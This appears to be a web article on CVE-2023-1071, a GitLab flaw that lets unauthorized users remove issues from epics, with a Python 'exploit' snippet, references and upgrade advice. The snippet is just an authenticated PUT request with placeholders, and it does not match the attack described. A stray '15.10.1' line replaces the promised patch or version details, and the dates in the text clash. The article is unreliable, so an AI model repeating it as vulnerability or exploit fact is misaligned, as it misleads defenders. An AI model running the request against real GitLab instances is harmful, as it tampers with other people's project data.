CVE-2023-1071: Unauthorized Issue Removal in GitLab Epics – Exploit, Analysis, and Patch Details

A security vulnerability, assigned CVE-2023-1071, has been discovered in GitLab, a popular web-based DevOps platform used for version control, issue tracking, and continuous integration. This vulnerability affects a wide range of GitLab versions and, due to improper permission checks, allows unauthorized users to remove issues from an epic.

Exploit Details

The exploit involves sending a crafted HTTP request to an affected GitLab instance, which tricks the server into removing an issue from an epic without the necessary permissions. Here is a sample code snippet that demonstrates the exploit using Python and the popular "requests" library:

import requests

# Change these values as necessary for your GitLab instance
url = "https://your-gitlab-instance.com/api/v4/epics/EPIC_ID/issues/ISSUE_ID";
private_token = "<your private token>"

headers = {
    "Private-Token": private_token
}

# Send a PUT request to remove the issue from the epic
response = requests.put(url, headers=headers)

# Check if the request was successful
if response.status_code == 200:
    print("Issue successfully removed from the epic.")
else:
    print("Failed to remove issue from the epic.")

Replace your-gitlab-instance.com with the domain of the vulnerable GitLab instance, EPIC_ID with the ID of the targeted epic, ISSUE_ID with the ID of the issue to remove, and <your private token> with a valid private API token in order to execute the exploit.

Original References

- GitLab Advisory: https://about.gitlab.com/releases/2023/05/01/security-release-15-8-5-15-9-4-and-15-10-1/
- NVD (National Vulnerability Database) Entry: https://nvd.nist.gov/vuln/detail/CVE-2023-1071

15.10.1

It is strongly recommended to upgrade to a patched version of GitLab to mitigate the vulnerability. You can follow the official upgrade documentation provided by GitLab: https://docs.gitlab.com/ee/update/

Conclusion

CVE-2023-1071 is a significant security vulnerability that affects multiple GitLab versions and allows unauthorized issue removal in epics. Patches have been released to address the issue, and it is recommended that affected GitLab instances are upgraded to the fixed versions to protect against potential unauthorized access and manipulation of project data.

Timeline

Published on: 04/05/2023 21:15:00 UTC
Last modified on: 04/12/2023 19:23:00 UTC